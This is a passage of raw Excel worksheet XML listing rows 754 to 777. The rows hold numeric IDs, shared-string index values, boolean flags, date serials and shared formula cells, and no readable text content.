        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="1">
        <v>10010.0</v>
      </c>
      <c r="B754" s="2" t="s">
        <v>3366</v>
      </c>
      <c r="C754" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D754" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E754" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F754" s="1" t="s">
        <v>3351</v>
      </c>
      <c r="G754" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H754" s="1" t="s">
        <v>3367</v>
      </c>
      <c r="I754" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J754" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K754" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L754" s="1">
        <v>6.0</v>
      </c>
      <c r="M754" s="1">
        <v>12.0</v>
      </c>
      <c r="N754" s="1" t="s">
        <v>3368</v>
      </c>
      <c r="O754" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P754" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q754" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R754" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S754" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="1">
        <v>10011.0</v>
      </c>
      <c r="B755" s="2" t="s">
        <v>3369</v>
      </c>
      <c r="C755" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D755" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E755" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F755" s="1" t="s">
        <v>3363</v>
      </c>
      <c r="G755" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H755" s="4">
        <v>44683.313888888886</v>
      </c>
      <c r="I755" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J755" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K755" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L755" s="1">
        <v>6.0</v>
      </c>
      <c r="M755" s="1">
        <v>12.0</v>
      </c>
      <c r="N755" s="1" t="s">
        <v>3370</v>
      </c>
      <c r="O755" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P755" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q755" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R755" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S755" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="1">
        <v>10012.0</v>
      </c>
      <c r="B756" s="2" t="s">
        <v>3371</v>
      </c>
      <c r="C756" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D756" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E756" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F756" s="1" t="s">
        <v>3351</v>
      </c>
      <c r="G756" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H756" s="4">
        <v>44683.57708333333</v>
      </c>
      <c r="I756" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J756" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K756" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L756" s="1">
        <v>6.0</v>
      </c>
      <c r="M756" s="1">
        <v>12.0</v>
      </c>
      <c r="N756" s="1" t="s">
        <v>3372</v>
      </c>
      <c r="O756" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P756" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q756" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R756" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S756" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="1">
        <v>10013.0</v>
      </c>
      <c r="B757" s="2" t="s">
        <v>3373</v>
      </c>
      <c r="C757" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D757" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E757" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F757" s="1" t="s">
        <v>3374</v>
      </c>
      <c r="G757" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H757" s="1" t="s">
        <v>3375</v>
      </c>
      <c r="I757" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J757" s="1" t="s">
        <v>3376</v>
      </c>
      <c r="K757" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L757" s="1">
        <v>10.0</v>
      </c>
      <c r="M757" s="1">
        <v>12.0</v>
      </c>
      <c r="N757" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O757" s="1" t="s">
        <v>3377</v>
      </c>
      <c r="P757" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q757" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R757" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S757" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="1">
        <v>10015.0</v>
      </c>
      <c r="B758" s="2" t="s">
        <v>3378</v>
      </c>
      <c r="C758" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D758" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E758" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F758" s="1" t="s">
        <v>3360</v>
      </c>
      <c r="G758" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H758" s="1" t="s">
        <v>3379</v>
      </c>
      <c r="I758" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J758" s="1" t="s">
        <v>3376</v>
      </c>
      <c r="K758" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L758" s="1">
        <v>10.0</v>
      </c>
      <c r="M758" s="1">
        <v>12.0</v>
      </c>
      <c r="N758" s="1" t="s">
        <v>982</v>
      </c>
      <c r="O758" s="1" t="s">
        <v>3377</v>
      </c>
      <c r="P758" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q758" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R758" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S758" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="1">
        <v>10016.0</v>
      </c>
      <c r="B759" s="2" t="s">
        <v>3380</v>
      </c>
      <c r="C759" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D759" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E759" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F759" s="1" t="s">
        <v>2208</v>
      </c>
      <c r="G759" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H759" s="4">
        <v>44565.126388888886</v>
      </c>
      <c r="I759" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J759" s="1" t="s">
        <v>3376</v>
      </c>
      <c r="K759" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L759" s="1">
        <v>10.0</v>
      </c>
      <c r="M759" s="1">
        <v>12.0</v>
      </c>
      <c r="N759" s="1" t="s">
        <v>3381</v>
      </c>
      <c r="O759" s="1" t="s">
        <v>3377</v>
      </c>
      <c r="P759" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q759" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R759" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S759" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="1">
        <v>10018.0</v>
      </c>
      <c r="B760" s="7" t="s">
        <v>3382</v>
      </c>
      <c r="C760" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D760" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E760" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F760" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G760" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H760" s="4">
        <v>44565.15972222222</v>
      </c>
      <c r="I760" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J760" s="1" t="s">
        <v>3376</v>
      </c>
      <c r="K760" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L760" s="1">
        <v>10.0</v>
      </c>
      <c r="M760" s="1">
        <v>12.0</v>
      </c>
      <c r="N760" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O760" s="1" t="s">
        <v>3377</v>
      </c>
      <c r="P760" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q760" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R760" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S760" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="1">
        <v>10019.0</v>
      </c>
      <c r="B761" s="2" t="s">
        <v>3383</v>
      </c>
      <c r="C761" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D761" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E761" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F761" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="G761" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H761" s="4">
        <v>44565.21111111111</v>
      </c>
      <c r="I761" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J761" s="1" t="s">
        <v>3376</v>
      </c>
      <c r="K761" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L761" s="1">
        <v>10.0</v>
      </c>
      <c r="M761" s="1">
        <v>12.0</v>
      </c>
      <c r="N761" s="1" t="s">
        <v>647</v>
      </c>
      <c r="O761" s="1" t="s">
        <v>3377</v>
      </c>
      <c r="P761" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q761" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R761" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S761" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="1">
        <v>10025.0</v>
      </c>
      <c r="B762" s="2" t="s">
        <v>3384</v>
      </c>
      <c r="C762" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D762" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E762" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F762" s="1" t="s">
        <v>3385</v>
      </c>
      <c r="G762" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H762" s="4">
        <v>44657.61666666667</v>
      </c>
      <c r="I762" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J762" s="1" t="s">
        <v>3386</v>
      </c>
      <c r="K762" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L762" s="1">
        <v>3.0</v>
      </c>
      <c r="M762" s="1">
        <v>3.0</v>
      </c>
      <c r="N762" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O762" s="1" t="s">
        <v>3387</v>
      </c>
      <c r="P762" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q762" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R762" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S762" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="1">
        <v>10026.0</v>
      </c>
      <c r="B763" s="2" t="s">
        <v>3388</v>
      </c>
      <c r="C763" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D763" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E763" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F763" s="1" t="s">
        <v>1205</v>
      </c>
      <c r="G763" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H763" s="4">
        <v>44657.99166666667</v>
      </c>
      <c r="I763" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J763" s="1" t="s">
        <v>3386</v>
      </c>
      <c r="K763" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L763" s="1">
        <v>3.0</v>
      </c>
      <c r="M763" s="1">
        <v>3.0</v>
      </c>
      <c r="N763" s="1" t="s">
        <v>3389</v>
      </c>
      <c r="O763" s="1" t="s">
        <v>3387</v>
      </c>
      <c r="P763" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q763" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R763" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S763" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="1">
        <v>10027.0</v>
      </c>
      <c r="B764" s="2" t="s">
        <v>3390</v>
      </c>
      <c r="C764" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D764" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E764" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F764" s="1" t="s">
        <v>3391</v>
      </c>
      <c r="G764" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H764" s="1" t="s">
        <v>3392</v>
      </c>
      <c r="I764" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J764" s="1" t="s">
        <v>3386</v>
      </c>
      <c r="K764" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L764" s="1">
        <v>3.0</v>
      </c>
      <c r="M764" s="1">
        <v>3.0</v>
      </c>
      <c r="N764" s="1" t="s">
        <v>3393</v>
      </c>
      <c r="O764" s="1" t="s">
        <v>3387</v>
      </c>
      <c r="P764" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q764" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R764" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S764" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="1">
        <v>10028.0</v>
      </c>
      <c r="B765" s="2" t="s">
        <v>3394</v>
      </c>
      <c r="C765" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D765" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E765" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F765" s="1" t="s">
        <v>3396</v>
      </c>
      <c r="G765" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H765" s="4">
        <v>44107.745833333334</v>
      </c>
      <c r="I765" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J765" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="K765" s="2" t="s">
        <v>3398</v>
      </c>
      <c r="L765" s="1">
        <v>3.0</v>
      </c>
      <c r="M765" s="1">
        <v>4.0</v>
      </c>
      <c r="N765" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O765" s="1" t="s">
        <v>3399</v>
      </c>
      <c r="P765" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q765" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R765" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S765" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="1">
        <v>10029.0</v>
      </c>
      <c r="B766" s="2" t="s">
        <v>3400</v>
      </c>
      <c r="C766" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D766" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E766" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F766" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G766" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H766" s="4">
        <v>44107.80902777778</v>
      </c>
      <c r="I766" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J766" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="K766" s="2" t="s">
        <v>3398</v>
      </c>
      <c r="L766" s="1">
        <v>3.0</v>
      </c>
      <c r="M766" s="1">
        <v>4.0</v>
      </c>
      <c r="N766" s="1" t="s">
        <v>3401</v>
      </c>
      <c r="O766" s="1" t="s">
        <v>3399</v>
      </c>
      <c r="P766" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q766" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R766" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S766" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="1">
        <v>10030.0</v>
      </c>
      <c r="B767" s="2" t="s">
        <v>3402</v>
      </c>
      <c r="C767" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D767" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E767" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F767" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="G767" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H767" s="1" t="s">
        <v>3403</v>
      </c>
      <c r="I767" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J767" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="K767" s="2" t="s">
        <v>3398</v>
      </c>
      <c r="L767" s="1">
        <v>3.0</v>
      </c>
      <c r="M767" s="1">
        <v>4.0</v>
      </c>
      <c r="N767" s="1" t="s">
        <v>3404</v>
      </c>
      <c r="O767" s="1" t="s">
        <v>3399</v>
      </c>
      <c r="P767" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q767" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R767" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S767" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="1">
        <v>10031.0</v>
      </c>
      <c r="B768" s="2" t="s">
        <v>3405</v>
      </c>
      <c r="C768" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D768" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E768" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F768" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G768" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H768" s="1" t="s">
        <v>3406</v>
      </c>
      <c r="I768" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J768" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="K768" s="2" t="s">
        <v>3398</v>
      </c>
      <c r="L768" s="1">
        <v>3.0</v>
      </c>
      <c r="M768" s="1">
        <v>4.0</v>
      </c>
      <c r="N768" s="1" t="s">
        <v>3407</v>
      </c>
      <c r="O768" s="1" t="s">
        <v>3399</v>
      </c>
      <c r="P768" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q768" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R768" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S768" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="1">
        <v>10032.0</v>
      </c>
      <c r="B769" s="2" t="s">
        <v>3340</v>
      </c>
      <c r="C769" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D769" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E769" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F769" s="1" t="s">
        <v>2384</v>
      </c>
      <c r="G769" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H769" s="1" t="s">
        <v>3408</v>
      </c>
      <c r="I769" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J769" s="1" t="s">
        <v>3409</v>
      </c>
      <c r="K769" s="2" t="s">
        <v>3410</v>
      </c>
      <c r="L769" s="1">
        <v>4.0</v>
      </c>
      <c r="M769" s="1">
        <v>5.0</v>
      </c>
      <c r="N769" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O769" s="1" t="s">
        <v>234</v>
      </c>
      <c r="P769" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q769" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R769" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S769" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="1">
        <v>10033.0</v>
      </c>
      <c r="B770" s="2" t="s">
        <v>3411</v>
      </c>
      <c r="C770" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D770" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E770" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F770" s="1" t="s">
        <v>3412</v>
      </c>
      <c r="G770" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H770" s="1" t="s">
        <v>3413</v>
      </c>
      <c r="I770" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J770" s="1" t="s">
        <v>3409</v>
      </c>
      <c r="K770" s="2" t="s">
        <v>3410</v>
      </c>
      <c r="L770" s="1">
        <v>4.0</v>
      </c>
      <c r="M770" s="1">
        <v>5.0</v>
      </c>
      <c r="N770" s="1" t="s">
        <v>1629</v>
      </c>
      <c r="O770" s="1" t="s">
        <v>234</v>
      </c>
      <c r="P770" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q770" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R770" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S770" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="1">
        <v>10037.0</v>
      </c>
      <c r="B771" s="2" t="s">
        <v>3414</v>
      </c>
      <c r="C771" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D771" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E771" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F771" s="1" t="s">
        <v>3415</v>
      </c>
      <c r="G771" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H771" s="4">
        <v>44866.84375</v>
      </c>
      <c r="I771" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J771" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K771" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L771" s="1">
        <v>6.0</v>
      </c>
      <c r="M771" s="1">
        <v>13.0</v>
      </c>
      <c r="N771" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O771" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P771" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q771" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R771" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S771" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="1">
        <v>10038.0</v>
      </c>
      <c r="B772" s="2" t="s">
        <v>3419</v>
      </c>
      <c r="C772" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D772" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E772" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F772" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G772" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H772" s="4">
        <v>44866.85277777778</v>
      </c>
      <c r="I772" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J772" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K772" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L772" s="1">
        <v>6.0</v>
      </c>
      <c r="M772" s="1">
        <v>13.0</v>
      </c>
      <c r="N772" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O772" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P772" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q772" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R772" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S772" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="1">
        <v>10039.0</v>
      </c>
      <c r="B773" s="2" t="s">
        <v>3420</v>
      </c>
      <c r="C773" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D773" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E773" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F773" s="1" t="s">
        <v>824</v>
      </c>
      <c r="G773" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H773" s="4">
        <v>44866.86319444444</v>
      </c>
      <c r="I773" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J773" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K773" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L773" s="1">
        <v>6.0</v>
      </c>
      <c r="M773" s="1">
        <v>13.0</v>
      </c>
      <c r="N773" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O773" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P773" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q773" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R773" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S773" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="1">
        <v>10040.0</v>
      </c>
      <c r="B774" s="2" t="s">
        <v>3421</v>
      </c>
      <c r="C774" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D774" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E774" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F774" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G774" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H774" s="4">
        <v>44866.875</v>
      </c>
      <c r="I774" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J774" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K774" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L774" s="1">
        <v>6.0</v>
      </c>
      <c r="M774" s="1">
        <v>13.0</v>
      </c>
      <c r="N774" s="1" t="s">
        <v>3152</v>
      </c>
      <c r="O774" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P774" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q774" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R774" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S774" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="1">
        <v>10041.0</v>
      </c>
      <c r="B775" s="2" t="s">
        <v>3422</v>
      </c>
      <c r="C775" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D775" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E775" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F775" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G775" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H775" s="4">
        <v>44866.92986111111</v>
      </c>
      <c r="I775" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J775" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K775" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L775" s="1">
        <v>6.0</v>
      </c>
      <c r="M775" s="1">
        <v>13.0</v>
      </c>
      <c r="N775" s="1" t="s">
        <v>3423</v>
      </c>
      <c r="O775" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P775" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q775" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R775" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S775" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="1">
        <v>10042.0</v>
      </c>
      <c r="B776" s="2" t="s">
        <v>3424</v>
      </c>
      <c r="C776" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D776" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E776" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F776" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G776" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H776" s="4">
        <v>44866.93125</v>
      </c>
      <c r="I776" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J776" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K776" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L776" s="1">
        <v>6.0</v>
      </c>
      <c r="M776" s="1">
        <v>13.0</v>
      </c>
      <c r="N776" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O776" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P776" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q776" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R776" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S776" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="1">
        <v>10043.0</v>
      </c>
      <c r="B777" s="2" t="s">
        <v>3425</v>
      </c>
      <c r="C777" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D777" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E777" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F777" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G777" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H777" s="4">
        <v>44866.93402777778</v>
      </c>
      <c r="I777" s="1" t="s">
